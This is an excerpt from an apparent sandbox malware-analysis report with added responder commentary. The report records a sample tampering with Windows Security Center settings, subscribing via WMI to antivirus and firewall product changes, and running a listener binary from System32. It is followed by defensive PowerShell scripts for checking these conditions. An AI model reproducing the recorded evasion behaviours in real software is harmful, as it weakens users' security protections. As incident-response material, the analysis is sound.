Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Code function: 46_2_64942A90 GetSystemTimeAsFileTime, 46_2_64942A90
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEF2860 GetUserNameA,GetLastError,_strdup, 46_2_00007FFA2CEF2860
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: svchost.exe, 0000000E.00000002.2323835397.0000022F5ED02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.2323835397.0000022F5ED02000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
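The Security Center observations above are worth reading together. MpCmdRun.exe is Windows Defender's own command-line tool, so its enumeration of AntiVirusProduct in root\SecurityCenter2 is expected behaviour. The svchost.exe line is different: IWbemServices::ExecNotificationQuery registers a temporary, in-process event subscription, here for the creation, deletion or modification of any AntiVirusProduct, FirewallProduct or AntiSpywareProduct instance, which is what a process does when it intends to react to a security product appearing or changing state. Because the subscription is temporary it leaves nothing behind in root\subscription once the process exits, so it is only visible while the process runs. Note also that the sample queried the legacy ROOT\SecurityCenter namespace; on current Windows the populated namespace is root\SecurityCenter2. Together with the 'cval' value written under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center, this is the state a responder should re-check on an affected host. The PowerShell below is an added example written for this page, not code from the report or from the sample. It assumes the Defender cmdlets (Get-MpPreference) are present, and its decoding of productState follows the widely used but not officially documented convention that the middle byte of the 24-bit value (0x10 or 0x11) means the product is enabled and the low byte 0x00 means signatures are current.

```powershell
# Added example for this page (not code from the report or the sample): re-check the state
# the sample tampered with. Assumes the Defender cmdlets (Get-MpPreference) are available.

function Get-SecurityProductState {
    # Same classes the sample subscribed to; root\SecurityCenter2 is the namespace current
    # Windows populates (the sample's own query went to the legacy root\SecurityCenter).
    foreach ($class in 'AntiVirusProduct', 'AntiSpywareProduct', 'FirewallProduct') {
        try {
            Get-CimInstance -Namespace 'root\SecurityCenter2' -ClassName $class -ErrorAction Stop |
                ForEach-Object {
                    $state = [int]$_.productState
                    [pscustomobject]@{
                        Class       = $class
                        DisplayName = $_.displayName
                        State       = ('0x{0:X6}' -f $state)
                        # Undocumented but widely used decoding: middle byte 0x10/0x11 = enabled,
                        # low byte 0x00 = signatures current (0x10 = out of date).
                        Enabled     = ((($state -shr 8) -band 0xFF) -in @(0x10, 0x11))
                        SigsCurrent = (($state -band 0xFF) -eq 0)
                        Exe         = $_.pathToSignedProductExe
                    }
                }
        } catch {
            # Class or namespace absent (e.g. server SKUs): nothing registered, nothing to report.
        }
    }
}

function Get-SecurityCenterRegistry {
    # The report shows svchost.exe creating or modifying a value named 'cval' under this key.
    $key = 'HKLM:\SOFTWARE\Microsoft\Security Center'
    if (-not (Test-Path -Path $key)) { return }
    $reg = Get-Item -Path $key
    foreach ($name in $reg.GetValueNames()) {
        [pscustomobject]@{
            Name  = if ($name -eq '') { '(Default)' } else { $name }
            Value = $reg.GetValue($name)
            Flag  = ($name -eq 'cval')   # value name the report attributes to the sample
        }
    }
}

function Get-DefenderExclusions {
    # The signature list reports a Defender directory exclusion being added; show what is there.
    try { $pref = Get-MpPreference -ErrorAction Stop } catch { return }
    [pscustomobject]@{
        RealtimeDisabled = [bool]$pref.DisableRealtimeMonitoring
        ExcludedPaths    = @($pref.ExclusionPath)
        ExcludedExts     = @($pref.ExclusionExtension)
        ExcludedProcs    = @($pref.ExclusionProcess)
    }
}

Get-SecurityProductState   | Format-Table -AutoSize
Get-SecurityCenterRegistry | Format-Table -AutoSize
Get-DefenderExclusions     | Format-List
```

Run it elevated on the affected host and compare against a known-good machine of the same build: a 'cval' value, an AntiVirusProduct whose Enabled column is false, or an unexplained path exclusion are each worth a ticket on their own.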
Source: C:\Windows\explorer.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3312D7E0 bind,WSAGetLastError, 51_2_00007FFA3312D7E0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA330E78B0 memset,strncmp,strncmp,strchr,inet_pton,htons,strtoul,inet_pton,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, 51_2_00007FFA330E78B0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA330FC620 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons, 51_2_00007FFA330FC620
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3312D5B2 bind,WSAGetLastError, 51_2_00007FFA3312D5B2
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33126B0D htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket, 51_2_00007FFA33126B0D
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33126B40 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket, 51_2_00007FFA33126B40
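The console_zero.exe functions above (inet_pton/htons address parsing, then bind, getsockname, listen, accept, send, recv) are the shape of a network listener rather than a client. The binary runs from C:\Windows\System32, and on an affected host that location is not a trust signal on its own; the Authenticode signature is. The PowerShell below is an added example written for this page, not code from the report or from the sample. It lists every listening TCP endpoint, maps each to the owning process image, and flags images that are not validly signed by a signer on an allow-list. The allow-list names ('Microsoft Windows', 'Microsoft Corporation') are assumptions to adjust for the environment. Catalog-signed system binaries validate through Get-AuthenticodeSignature on current Windows, but treat a NotSigned result as something to look at rather than as proof of anything.

```powershell
# Added example for this page (not code from the report or the sample): list listening TCP
# endpoints with their owning image and Authenticode status. Allow-list names are assumptions.

function Get-ListenerReport {
    param([string[]]$AllowedSigners = @('Microsoft Windows', 'Microsoft Corporation'))

    # Index running processes by PID once; OwningProcess is a uint32, Process.Id an int.
    $byPid = @{}
    Get-Process | ForEach-Object { $byPid[$_.Id] = $_ }

    Get-NetTCPConnection -State Listen | ForEach-Object {
        $proc = $byPid[[int]$_.OwningProcess]
        # .Path is $null for protected or kernel-owned processes (PID 4); keep those visible.
        $path = if ($proc) { $proc.Path } else { $null }
        $sig  = if ($path) { Get-AuthenticodeSignature -FilePath $path } else { $null }
        $signer = if ($sig -and $sig.SignerCertificate) {
            $sig.SignerCertificate.GetNameInfo('SimpleName', $false)
        } else { '' }
        $trusted = [bool]($sig -and $sig.Status -eq 'Valid' -and ($AllowedSigners -contains $signer))

        [pscustomobject]@{
            Local     = '{0}:{1}' -f $_.LocalAddress, $_.LocalPort
            Pid       = $_.OwningProcess
            Name      = if ($proc) { $proc.ProcessName } else { '?' }
            Image     = $path
            SigStatus = if ($sig) { $sig.Status.ToString() } else { 'n/a' }
            Signer    = $signer
            Flag      = -not $trusted
        }
    }
}

# Untrusted listeners first; a flagged image under C:\Windows\System32 is the console_zero.exe case.
Get-ListenerReport | Sort-Object Flag -Descending | Format-Table -AutoSize
```

Get-NetTCPConnection only covers TCP, which is what the listen/accept pair implies here; Get-NetUDPEndpoint gives the equivalent view for UDP sockets if the binary's bind calls turn out to be datagram ones.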
[Figure legend, contacted-IP distribution map: No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs]